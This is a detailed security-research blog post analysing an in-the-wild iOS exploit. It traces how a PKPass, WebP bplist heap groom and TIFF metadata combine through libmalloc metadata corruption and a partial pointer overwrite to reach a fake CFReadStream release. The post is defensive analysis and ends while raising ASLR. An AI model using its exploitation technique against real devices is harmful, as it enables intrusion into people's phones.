    I covered the binary plist format in a previous blog post. That was the second time I'd had to analyse a large bplist. The first time (for the FORCEDENTRY sandbox escape) it was possible mostly by hand, just using the human-readable output of plutil. Last year, for the Safari sandbox escape analysis, the bplist was 437KB and I had to write a custom bplist parser to figure out what was going on. Keeping the exponential curve going this year the bplist was 10x larger again.

    In this case it's fairly clear that the bplist must be a heap groom - and at 5.5MB, presumably a fairly complicated one. So what's it doing?

    Switching Views

    I had a hunch that the bplist would use duplicate dictionary keys as a fundamental building block for the heap groom, but running my parser it didn't output any... until I realised that my tool stored the parsed dictionaries directly as python dictionaries before dumping them. Fixing the tools to instead keep lists of keys and values it became clear that there were duplicate keys. Lots of them:

    [Image: Parser output showing a series of nested dictionary creations with duplicate keys.]

    In the Safari exploit writeup I described how I used different visualisation techniques to try to explore the structure of the objects, looking for patterns I could use to simplify what was going on. In this case, modifying the parser to emit well-formed curly brackets and indentation then relying on VS Code's automatic code-folding proved to work well enough for browsing around and getting a feel for the structure of the groom object.

    Sometimes the right visualisation technique is sufficient to figure out what the exploit is trying to do. In this case, where the primitive is a heap-based buffer overflow, the groom will inevitably try to put two things next to each other in memory and I want to know "what two things?"

    But no matter how long I stared and scrolled, I couldn't figure anything out. Time to try something different.

    Instrumentation

    I wrote a small helper to load the bplist using the same API as the MakerNote parser and ran it using the Mac Instruments app:

    [Image: Instruments allocation summary, with the top three categories 'All Heap & Anonymous...', 'CFString (store)', and 'Malloc 16.00 KiB'.]

    Parsing the single 5.5MB bplist causes nearly half a million allocations, churning through nearly a gigabyte of memory. Just looking through this allocation summary it's clear there's lots of CFString and CFData objects, likely used for heap shaping. Looking further down the list there are other interesting numbers:

    [Image: Memory allocation table showing 'All Heap & Anonymous...' using 990.66 MiB of total bytes, 660.77 MiB of it persistent.]

    The 20'000 in the last line is far too round a number to be a coincidence. This number matches up with the number of __NSDictionaryM objects allocated:

    [Image: Allocation-size breakdown showing, among others, 20000 allocated __NSDictionaryM objects.]

    Finally, at the very bottom of the list there are two more allocation patterns which stand out:

    [Image: Allocation table highlighting two sets of very large allocations.]

    There are two sets of very large allocations: eighty 1MB allocations and 44 4MB ones.

    I modified my bplist tool again to dump out each unique string or data buffer, along with a count of how many times it was seen and its hash. Looking through the file listing there's a clear pattern:

    Object Size    Count
    0x3FFFFF       44
    0xFFFFF        80
    0x3FFF         20
    0x26A9         24978
    0x2554         44
    0x23FF         5822
    0x22A9         4
    0x1FFF         2
    0x1EA9         26
    0x1D54         40
    0x17FF         66
    0x13FF         66
    0x3FF          322
    0x3D7          404
    0xF            112882
    0x8            3
    There are a large number of allocations which fall just below a "round" number in hexadecimal: 0x3ff, 0x13ff, 0x17ff, 0x1fff, 0x23ff, 0x3fff... That heavily hints that they are sized to fall exactly within certain allocator size buckets.
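The arithmetic behind that hint, assuming libmalloc's historical tiny-zone (16-byte) and small-zone (512-byte) quanta:

```python
# Each request is rounded up to an allocator size-class boundary, so sizes
# just under a round number waste no slack within their bucket.
def round_up(size, quantum):
    return -(-size // quantum) * quantum   # ceiling division, then scale

print(hex(round_up(0x3FF, 16)))    # tiny zone: 0x3FF → 0x400
print(hex(round_up(0x2F28, 512)))  # small zone: the huffman table → 0x3000
```

Picking sizes like 0x3FF or 0x13FF therefore gives precise control over which size class, and thus which region of the heap, each groom object lands in.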

    Almost all of the allocations are just filled with zeros or 'A's. But the 1MB one is quite different:

    $ hexdump -C 170ae757_80.bin | head -n 20

    00000000  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|

    00000010  00 00 00 00 00 00 00 00  80 26 00 00 01 00 00 00  |.........&......|

    00000020  1f 00 00 00 00 00 00 00  10 00 8b 56 02 00 00 00  |...........V....|

    00000030  b0 c3 31 16 02 00 00 00  60 e3 01 00 00 00 00 00  |..1.....`.......|

    00000040  20 ec 46 58 02 00 00 00  00 00 00 00 00 00 00 00  | .FX............|

    00000050  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|

    00000060  00 00 00 00 00 00 00 00  60 bf 31 16 02 00 00 00  |........`.1.....|

    00000070  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|

    *

    000004b0  00 00 00 00 00 00 00 00  10 c4 31 16 02 00 00 00  |..........1.....|

    000004c0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|

    *

    000004e0  02 1c 00 00 01 00 00 00  00 00 00 00 00 00 00 00  |................|

    000004f0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|

    00000500  00 00 00 00 00 00 00 00  70 80 33 16 02 00 00 00  |........p.3.....|

    00000510  b8 b5 e5 57 02 00 00 00  ff ff ff ff ff ff ff ff  |...W............|

    00000520  58 c4 31 16 02 00 00 00  00 00 00 00 00 00 00 00  |X.1.............|

    00000530  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|

    *

    00000550  50 75 2c 18 02 00 00 00  01 00 00 00 00 00 00 00  |Pu,.............|

    Further on in the hexdump of the 1MB object there's clearly an NSExpression payload - this payload is also visible just by running strings on the WebP file. Matthias Frielingsdorf from iVerify gave a talk at BlackHat Asia with an initial analysis of this NSExpression payload; we'll return to that at the end of this blog post.

    Equally striking (and visible in the hexdump above): there are clearly pointers in there. It's too early in the analysis to know whether this is a payload which gets rebased somehow, or whether there's a separate ASLR disclosure step.

    On a slightly higher level this hexdump looks a little bit like an Objective-C or C++ object, though some things are strange. Why are the first 24 bytes all zero? Why isn't there an isa pointer or vtable? It looks a bit like there are a number of integer fields before the pointers, but what are they? At this stage of the analysis, I had no idea.

    Thinking dynamically

    I had tried a lot to reproduce the exploit primitives on a real device; I built tooling to dynamically generate and sign legitimate PKPass files that I could send via iMessage to test devices and I could crash a lot, but I never seemed to get very far into the exploit - the iOS version range where the heap grooming works seems to be pretty small, and I didn't have an exact device and iOS version match to test on.

Regardless of what I tried - sending the original exploits via iMessage, sending custom PKPasses with the trigger and groom, rendering the WebP directly in a test app or trying to use the PassKit APIs to render the PKPass file - the best I could manage dynamically was to trigger a heap metadata integrity check failure, which I assumed was indicative of the exploit failing.

    (Amusingly, using the legitimate APIs to render the PKPass inside an app failed with an error that the PKPass file was malformed. And indeed, the exploit sample PKPass is malformed: it's missing multiple required files. But the "secure" PKPass BlastDoor parser entrypoint (PKPassSecurePreviewContextCreateMessagesPreview) is, in this regard at least, less strict and will attempt to render an incomplete and invalid PKPass).

Though getting the whole PKPass parsed was proving tricky, with a bit of reversing it was possible to call the correct underlying CoreGraphics APIs to render the WebP and also get the EXIF/MakerNote parsed. By then setting a breakpoint when the huffman tables were allocated, I had hoped it would become obvious what the overflow target was. But it was actually totally unclear what the following object was (here X3 points to the start of the huffman tables, which are 0x3000 bytes large):

    (lldb) x/6xg $x3+0x3000

    0x112000000: 0x0000000111800000 0x0000000000000000

    0x112000010: 0x00000000001a1600 0x0000000000000004

    0x112000020: 0x0000000000000001 0x0000000000000019

    The first qword (0x111800000) is a valid pointer, but this is clearly not an Objective-C object, nor did it seem to look like any other recognizable object or have much to do with either the bplist or WebP. But running the tests a few times, there was a curious pattern:

    (lldb) x/6xg $x3+0x3000

    0x148000000: 0x0000000147800000 0x0000000000000000

    0x148000010: 0x000000000019c800 0x0000000000000004

    0x148000020: 0x0000000000000001 0x0000000000000019

The huffman table is 0x2F28 bytes, which the allocator rounds up to 0x3000. And in both of those test runs, adding the allocation size to the huffman table pointer yielded a suspiciously round number. There's no way that's a coincidence. Running a few more tests, the table+0x3000 pointer was always 8MB aligned. I remembered from some presentations I'd read on the iOS userspace allocator that 8MB is a meaningful number. Here's one from Synacktiv:

    Presentation slide from SynAckTiv explaining scalable zone memory allocation using Tiny, Small, and Large racks

    Or this one from Angelboy:

    Slide from Angelboy explaining the 'Small' memory region in libmalloc, noting its size of 0x800000 and 16319 blocks, and showing a diagram of its memory layout and linked list structure.

8MB is the size of the iOS userspace default allocator's small rack regions. It looks like they might be grooming the allocator in order to target not application-specific data but allocator metadata. Time to dive into some libmalloc internals!

    libmalloc

    I'd suggest reading the two presentations linked above for a good overview of the iOS default userspace malloc implementation. Libmalloc manages memory on four levels of abstraction. From largest to smallest those are: rack, magazine, region and block. The size split between the tiny, small and large racks depends on the platform. Almost all the relevant allocations for this exploit come from the small rack, so that's the one I'll focus on.

Reading through the libmalloc source I noticed that the region trailer, whilst still called a trailer, has now been moved to the start of the region object. The small rack manages memory in regions of 8MB each. That 8MB gets split up into (for our purposes) three relevant parts: a header, an array of metadata words, then blocks of 512 bytes which form the allocations:

    Diagram showing a memory layout with a small pink block on the left labeled with 'free flag bit' and '15 count bits', and dimensions '0x28 bytes'. Below it is a larger white block labeled '512 bytes'. On the right is a larger structure composed of three stacked blocks, colored green, red, and blue, with the entire structure labeled '0x8200 bytes' and '8MB'.

    The first 0x28 bytes are a header where the first two fields form a linked-list of small regions:

    typedef struct region_trailer {

            struct region_trailer *prev;

            struct region_trailer *next;

            unsigned bytes_used;

            unsigned objects_in_use;

            mag_index_t mag_index;

            volatile int32_t pinned_to_depot;

            bool recirc_suitable;

            rack_dispose_flags_t dispose_flags;

    } region_trailer_t;

    The small region manages memory in units of 512 bytes called blocks. On iOS allocations from the small region consist of contiguous runs of up to 31 blocks. Each block has an associated 16-bit metadata word called a small meta word, which itself is subdivided into a "free" flag in the most-significant bit, and a 15-bit count.

To mark a contiguous run of blocks as in-use (belonging to an allocation) the first meta word has its free flag cleared and the count set to the number of blocks in the run. On free, an allocation is first placed on a lookaside list for rapid reuse without really being freed. But once an allocation really gets freed the allocator will attempt to greedily coalesce neighbouring chunks. While in-use runs can never exceed 31 blocks, free runs can grow to encompass the entire region.

    The groom

Below you can see the state of the meta words array for the small region directly following the region containing the huffman table as its last allocation:

    (lldb) x/200wh 0x148000028

    0x148000028: 0x0019 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000

    0x148000038: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000

    0x148000048: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000

    0x148000058: 0x0000 0x0003 0x0000 0x0000 0x0018 0x0000 0x0000 0x0000

    0x148000068: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000

    0x148000078: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000

    0x148000088: 0x0000 0x0000 0x0000 0x0000 0x0003 0x0000 0x0000 0x001c

    0x148000098: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000

    0x1480000a8: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000

    0x1480000b8: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000

    0x1480000c8: 0x0000 0x0000 0x0000 0x001d 0x0000 0x0000 0x0000 0x0000

    With some simple maths we can convert indexes in the meta words array into their corresponding heap pointers. Doing that it's possible to dump the memory associated with the allocations shown above. The larger 0x19, 0x18 and 0x1c allocations all seem to be generic groom allocations, but the two 0x3 block allocations appear more interesting. The first one (with the first metadata word at 0x14800005a, shown in yellow) is the code_lengths array which gets freed directly after the huffman table building fails. The blue 0x3 block run (with the first metadata word at 0x148000090) is the backing buffer for a CFSet object from the MakerNote and contains object pointers.

    Recall that the corruption primitive will write the dword 0x270007 0x58 bytes off the end of the 0x3000 allocation (and that allocation happens to sit directly in front of this small region). That corruption has the following effect (shown in bold):

    (lldb) x/200wh 0x148000028

    0x148000028: 0x0019 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000

    0x148000038: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000

    0x148000048: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000

    0x148000058: 0x0007 0x0027 0x0000 0x0000 0x0018 0x0000 0x0000 0x0000

    0x148000068: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000

    0x148000078: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000

    0x148000088: 0x0000 0x0000 0x0000 0x0000 0x0003 0x0000 0x0000 0x001c

    0x148000098: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000

    0x1480000a8: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000

    0x1480000b8: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000

    0x1480000c8: 0x0000 0x0000 0x0000 0x001d 0x0000 0x0000 0x0000 0x0000

    It's changed the size of an in-use allocation from 3 blocks to 39 (or from 1536 to 19968 bytes). I mentioned before that the maximum size of an in-use allocation is meant to be 31 blocks, but this doesn't seem to be checked in every single free path. If things don't quite work out, you'll hit a runtime check. But if things do work out you end up with a situation like this:

    (lldb) x/200wh 0x148000028

    0x148000028: 0x0019 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000

    0x148000038: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000

    0x148000048: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000

    0x148000058: 0x0007 0x8027 0x0000 0x0000 0x0018 0x0000 0x0000 0x0000

    0x148000068: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000

    0x148000078: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000

    0x148000088: 0x0000 0x0000 0x0000 0x0000 0x0003 0x0000 0x0000 0x001c

    0x148000098: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x8027

    0x1480000a8: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000

    0x1480000b8: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000

    0x1480000c8: 0x0000 0x0000 0x0000 0x001d 0x0000 0x0000 0x0000 0x0000

    The yellow (0x8027) allocation now extends beyond its original three blocks and completely overlaps the following green (0x18) and blue (0x3) as well as the start of the purple (0x1c) allocation.

But as soon as this corruption occurs, WebP parsing fails and it's not going to make any other allocations. So what are they doing? How are they able to leverage these overlapping allocations? I was pretty stumped.

One theory was that perhaps it was some internal ImageIO or BlastDoor-specific object which reallocated the overlapping memory. Another theory was that perhaps the exploit had two parts: this first part which puts overlapping entries on the allocator freelist, then a second file sent later to exploit that - and maybe I was simply lacking that file? But then, why would there be that huge 1MB payload with NSExpressions in it? That didn't add up.

    Puzzling pieces

As is so often the case, after stepping back and not thinking about the problem for a while I realised that I'd completely overlooked and forgotten something critical. Right at the very start of the analysis I had run file on all the files inside the PKPass and noted that background.png was actually not a PNG but a TIFF. I had then completely forgotten that. But now the solution seemed obvious: the reason to use a PKPass rather than just a WebP is that the PKPass parser will render multiple images in sequence, and there must be something in the TIFF which reallocates the overlapping allocation with something useful.

Libtiff comes with a suite of tools for parsing TIFF files. tiffdump displays the headers and EXIF tags:

    $ tiffdump background-15.tiff

    background-15.tiff:

    Magic: 0x4d4d <big-endian> Version: 0x2a <ClassicTIFF>

    Directory 0: offset 68 (0x44) next 0 (0)

    ImageWidth (256) SHORT (3) 1<48>

    ImageLength (257) SHORT (3) 1<16>

    BitsPerSample (258) SHORT (3) 4<8 8 8 8>

    Compression (259) SHORT (3) 1<8>

    Photometric (262) SHORT (3) 1<2>

    StripOffsets (273) LONG (4) 1<8>

    Orientation (274) SHORT (3) 1<1>

    SamplesPerPixel (277) SHORT (3) 1<4>

    StripByteCounts (279) LONG (4) 1<59>

    PlanarConfig (284) SHORT (3) 1<1>

    ExtraSamples (338) SHORT (3) 1<2>

    700 (0x2bc) BYTE (1) 15347<00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ...>

    33723 (0x83bb) UNDEFINED (7) 15347<00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ...>

    34377 (0x8649) BYTE (1) 15347<00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ...>

    ICC Profile (34675) UNDEFINED (7) 15347<00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ...>

    The presence of the four 15KB buffers is notable, but they seemed to mostly just be zeros. Here's the output from tiffinfo:

    $ tiffinfo -c -j -d -s -z background-15.tiff

    === TIFF directory 0 ===

    TIFF Directory at offset 0x44 (68)

      Image Width: 48 Image Length: 16

      Bits/Sample: 8

      Compression Scheme: AdobeDeflate

      Photometric Interpretation: RGB color

      Extra Samples: 1<unassoc-alpha>

      Orientation: row 0 top, col 0 lhs

      Samples/Pixel: 4

      Planar Configuration: single image plane

      XMLPacket (XMP Metadata):

      RichTIFFIPTC Data: <present>, 15347 bytes

      Photoshop Data: <present>, 15347 bytes

      ICC Profile: <present>, 15347 bytes

      1 Strips:

          0: [       8,       59]

    Strip 0:

     00 00 00 00 00 00 00 00 84 13 00 00 01 00 00 00 01 00 00 00 00 00 00 00

     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

     cd ab 34 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

    ...

This dumps the uncompressed TIFF strip buffer, which looks much more interesting! There's clearly some structure, though not a lot of it. Is this really enough to do something useful? It looks like there could be some sort of object, but I didn't recognise the structure, and had no idea how replacing an object with this would be useful. I explored two possibilities:

    1) Alpha blending:

    This is actually the raw TIFF strip after decompression but before the rendering step which applies the alpha, so it was possible that this got rendered "on top" of another object. That seemed like a reasonable explanation for why the object seemed so sparse; perhaps the idea was to just "move" a pointer value. The first 16 bytes of the strip look like this:

    00 00 00 00 00 00 00 00 84 13 00 00 01 00 00 00

    which when viewed as two 64-bit values look like this:

    0x0000000000000000 0x0000000100001384

    It seemed sort-of plausible that rendering the 0x100001384 on top of another pointer might be a neat primitive, but there was something that didn't quite add up. This pointer-ish value is at the start of the strip buffer, so if the overlapping allocation got reallocated with this strip buffer directly, nothing interesting would happen, as the overlapping parts are further along. Maybe the overlapping buffer gets split up multiple times, but this was seeming less and less likely, and I couldn't reproduce this part of the exploit to actually observe what happened.

    2) This is an object:

    The other theory I had was that this actually was an object. The 8 zero bytes at the start were certainly strange… so then what's the significance of the next 8 bytes?

    84 13 00 00 01 00 00 00

    I tried using lldb's memory find command to see if there were other instances of that exact byte sequence occurring in a test iOS app rendering the WebP then the TIFF using the CoreGraphics APIs:

    (lldb) memory find -e 0x100001384 -- 0x100000000 0x200000000

    data not found within the range.

    Nope, plus it was very, very slow.

    One thing I had noticed was that this byte sequence was similar to one near the start of the 1MB groom object:

    00000000  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|

    00000010  00 00 00 00 00 00 00 00  80 26 00 00 01 00 00 00  |.........&......|

    00000020  1f 00 00 00 00 00 00 00  10 00 8b 56 02 00 00 00  |...........V....|

    00000030  b0 c3 31 16 02 00 00 00  60 e3 01 00 00 00 00 00  |..1.....`.......|

    They're not identical, but it seemed a strange coincidence.

    I took a bunch of test app core dumps using lldb's process save-core command and wrote some simple code to search for similar-ish byte patterns. After some experimentation I managed to find something:

    1c7b2600  49 d2 e4 29 02 00 00 01  84 13 00 00 02 00 00 00  |I..)............|

    1c7b2610  42 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |B...............|

    1c7b2620  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|

    1c7b2630  c0 92 d6 83 02 00 00 00  00 93 d6 83 02 00 00 00  |................|

    Converting those coredump offsets into VM address and looking them up revealed:

    (lldb) x/10xg 0x121E47600

    0x121e47600: 0x0100000229e4d249 0x0000000200001384

    0x121e47610: 0x0000000000000042 0x0000000000000000

    0x121e47620: 0x0000000000000000 0x0000000000000000

    (lldb) image lookup --address 0x229e4d248

          Address: CoreFoundation[0x00000001dceed248] (CoreFoundation.__DATA_DIRTY.__objc_data + 7800)

          Summary: (void *)0x0000000229e4d0e0: __NSCFArray

    It's an NSCFArray, which is the Foundation (Objective-C) "toll-free bridged" version of the Core Foundation (C) CFArray type! This was the hint that I was looking for to identify the significance of the TIFF and that 1MB groom object, which also contains a similar byte sequence.

    Cores and Foundations

    Even though Apple hasn't updated the open-source version of CoreFoundation for almost a decade, the old source is still helpful. Here's what a CoreFoundation object looks like:

    /* All CF "instances" start with this structure.  Never refer to

     * these fields directly -- they are for CF's use and may be added

     * to or removed or change format without warning.  Binary

     * compatibility for uses of this struct is not guaranteed from

     * release to release.

     */

    typedef struct __CFRuntimeBase {

        uintptr_t _cfisa;

        uint8_t _cfinfo[4];

    #if __LP64__

        uint32_t _rc;

    #endif

    } CFRuntimeBase;

So the header is an Objective-C isa pointer followed by four bytes of _cfinfo, followed by a reference count. Taking a closer look at the uses of _cfinfo:

    CF_INLINE CFTypeID __CFGenericTypeID_inline(const void *cf) {

      // yes, 10 bits masked off, though 12 bits are

      // there for the type field; __CFRuntimeClassTableSize is 1024

      uint32_t *cfinfop = (uint32_t *)&(((CFRuntimeBase *)cf)->_cfinfo);

      CFTypeID typeID = (*cfinfop >> 8) & 0x03FF; // mask up to 0x0FFF

      return typeID;

    }

It seems that the second byte of _cfinfo is a type identifier. And indeed, running expr (int) CFArrayGetTypeID() in lldb prints 19 (0x13), which matches up with both the object found in the coredump as well as the strange (or now not-so-strange) object in the TIFF strip buffer.

    X steps forwards, Y steps back

    Looking through more of the CoreFoundation code it seems that the object in the TIFF strip buffer is a CFArray with inline storage containing one element with the value 0x1234abcd. It also seems that it's possible for CF objects to have NULL isa pointers, which explains why the first 8 bytes of the fake object are zero.

This is interesting, but it still doesn't actually get us any closer to figuring out what the next step of the exploit is. If the CFArray is meant to overlap with something, then what? And what interesting side-effects could having a CFArray with only a single element with the value 0x1234abcd possibly have?

    This seems like one step forward and two steps back, but there's something else which we can now figure out: what that 1MB groom object actually is. Let's take a look at the start of it again:

    00000000  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|

    00000010  00 00 00 00 00 00 00 00  80 26 00 00 01 00 00 00  |.........&......|

    00000020  1f 00 00 00 00 00 00 00  10 00 8b 56 02 00 00 00  |...........V....|

    00000030  b0 c3 31 16 02 00 00 00  48 e3 01 00 00 00 00 00  |..1.....H.......|

    00000040  20 ec 46 58 02 00 00 00  00 00 00 00 00 00 00 00  | .FX............|

    00000050  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|

    00000060  00 00 00 00 00 00 00 00  60 bf 31 16 02 00 00 00  |........`.1.....|

    00000070  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|

It looks like another CF object, starting at +0x10 in the buffer with the same NULL isa pointer, a reference count of 1 and a _cfinfo of {0x80, 0x26, 0, 0}. The type identifiers aren't actually fixed; they're allocated dynamically via calls to _CFRuntimeRegisterClass like this:

    CFTypeID CFArrayGetTypeID(void) {

        static dispatch_once_t initOnce;

        dispatch_once(&initOnce, ^{ __kCFArrayTypeID = _CFRuntimeRegisterClass(&__CFArrayClass); });

        return __kCFArrayTypeID;

    }

    The CFTypeIDs are really just indexes into the __CFRuntimeClassTable array, and even though the types are allocated dynamically the ordering seems sufficiently stable that the hardcoded type values in the exploit work. 0x26 is the CFTypeID for CFReadStream:

    struct _CFStream {

        CFRuntimeBase _cfBase;

        CFOptionFlags flags;

        CFErrorRef error;

        struct _CFStreamClient *client;

        void *info;

        const struct _CFStreamCallBacks *callBacks;

        CFLock_t streamLock;

        CFArrayRef previousRunloopsAndModes;

        dispatch_queue_t queue;

    };

    Looking through the CFStream code it seems to call various callback functions during object destruction — that seems like a very likely path towards code execution, though with some significant caveats:

    Caveat I: It's still unclear how an overlapping allocation in the small malloc region could lead to a CFRelease being called on this 1MB allocation.

    Caveat II: What about ASLR? There have been some tricks in the past targeting "universal gadgets" which work across multiple slides. Nemo also had a neat objective-c trick for defeating ASLR in the past, so it's plausible that there's something like that here.

    Caveat III: What about PAC? If it's a data-only attack then maybe PAC isn't an issue, but if they are trying to JOP they'd need a trick beyond just an ASLR leak, as all forward control flow edges should be protected by PAC.

    Special Delivery

Around this time in my analysis, Matthias Frielingsdorf offered me the use of an iPhone running iOS 16.6, the same version as the targeted ITW victim. With Matthias' vulnerable iPhone I was able to use the Dopamine jailbreak to attach lldb to MessagesBlastDoorService, and after a few tries was able to reproduce the exploit right up to the CFRelease call on the fake CFReadStream, confirming that that part of my analysis was correct!

    Collecting a few crashes led, yet again, to even more questions...

    Caveat I: Mysterious Pointers

Similar to the analysis of the huffman tables, there was a clear pattern in the fake object pointers, which this time was even stranger than with the huffman tables. The crash site was here:

    LDR    X8, [X19,#0x30]

    LDR    X8, [X8,#0x58]

    At this point X19 points to the fake CFReadStream object, and collecting a few X19 values there's a pretty clear pattern:

    0x000000075f000010

    0x0000000d4f000010

    The fake object is inside a 1MB heap allocation, but all those fake object addresses are always 16 bytes above a 16MB-aligned address. It seemed really strange to me to end up with a pointer 0x10 bytes past such a round number. What kind of construct would lead to the creation of such a pointer? Even though I did have a debugger attached to MessagesBlastDoorService, it wasn't a time-travel debugger, so figuring out the history of such a pointer was non-trivial. Using the same core dump analysis techniques I could see that the pointer which would end up in X19 was also present in the backing buffer of the CFSet described earlier. But how did it get there?

Having found the strange CFArray inside the TIFF I was heavily biased towards believing that this must have something to do with it, so I wrote some tooling to modify the fake CFArrays in the TIFF in the exploit. The theory was that by messing with that CFArray, I could cause a crash when it was used and figure out what was going on. But making minor changes to the strip buffer didn't seem to have any effect — the exploit still worked! Even replacing the entire strip buffer with A's didn't stop the exploit working... What's going on?

    Stepping back

I had made a list of the primitives I thought might lead to the creation of such a strange-looking pointer — first on the list was a partial pointer overwrite. But then why the CFArray? Now, having shown that the CFArray can't be involved, it was time to go back to the list. And to step back even further and make sure I'd really looked at all of that TIFF...

    There were still those four other metadata buffers in the tiffdump output I'd shown earlier:

    700 (0x2bc) BYTE (1) 15347<00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ...>

    33723 (0x83bb) UNDEFINED (7) 15347<00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ...>

    34377 (0x8649) BYTE (1) 15347<00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ...>

    ICC Profile (34675) UNDEFINED (7) 15347<00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ...>

I'd just dismissed them, but maybe I shouldn't have done that? I had actually already dumped the full contents of each of those buffers and checked that there wasn't something else apart from the zeros. They were all zeros, except the third-to-last byte of each, which was 0x10 - something I'd considered completely uninteresting. Uninteresting, unless you wanted to partially overwrite the three least-significant bytes of a little-endian pointer value with 0x000010, that is!

    Let's look back at the SMALL metadata:

    0x148000058: 0x0007 0x8027 0x0000 0x0000 0x0018 0x0000 0x0000 0x0000

    0x148000068: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000

    0x148000078: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000

    0x148000088: 0x0000 0x0000 0x0000 0x0000 0x0003 0x0000 0x0000 0x001c

    0x148000098: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x8027

    Each of those four metadata buffers in the TIFF is 15347 bytes, which is 0x3bf3 — looked at another way that's 0x3c00 (the size rounded up to the next 0x200 block size), minus 5, minus 8.

0x3c00 is exactly 30 0x200-byte blocks. Each 16-bit word in the metadata array shown above corresponds to one 0x200-byte block, and the overlapping run in yellow starts at the meta word at 0x14800005a. Counting forwards 30 blocks means that the end of a 0x3c00 allocation overlaps perfectly with the end of the original blue three-block allocation:

    0x148000058: 0x0007 0x8027 0x0000 0x0000 0x0018 0x0000 0x0000 0x0000

    0x148000068: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000

    0x148000078: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000

    0x148000088: 0x0000 0x0000 0x0000 0x0000 0x0003 0x0000 0x0000 0x001c

    0x148000098: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x8027

This has the effect of overwriting all but the last 16 bytes of the blue allocation with zeros, then overwriting the three least-significant bytes of the second-to-last pointer-sized value with the bytes 10 00 00; which, if that memory happened to contain a pointer, has the effect of "shifting" that pointer down to the nearest 16MB boundary, then adding 0x10 bytes! (For those who saw my 2024 OffensiveCon talk, this was the missing link I mentioned between the overlapping allocations and code execution.)

    As mentioned earlier, that blue allocation starting with 0x0003 is the backing buffer of a CFSet object from the bplist inside the WebP MakerNote. The set is constructed in a very precise fashion such that the target pointer (the one to be rounded down) ends up as the second-to-last pointer in the backing buffer. The 1MB object is then also groomed such that it falls on a 16MB boundary below the object which the CFSet entry originally points to. Then when that CFSet is destructed it calls CFRelease on each object, causing the fake CFReadStream destructor to run.

    Caveat II: ASLR

    We've looked at the whole flow from huffman table overflow to CFRelease being invoked on a fake CFReadStream — but there's still stuff missing. The second open question I discussed earlier was ASLR. I had theorised that maybe it used a trick like a universal gadget, but is that the case?

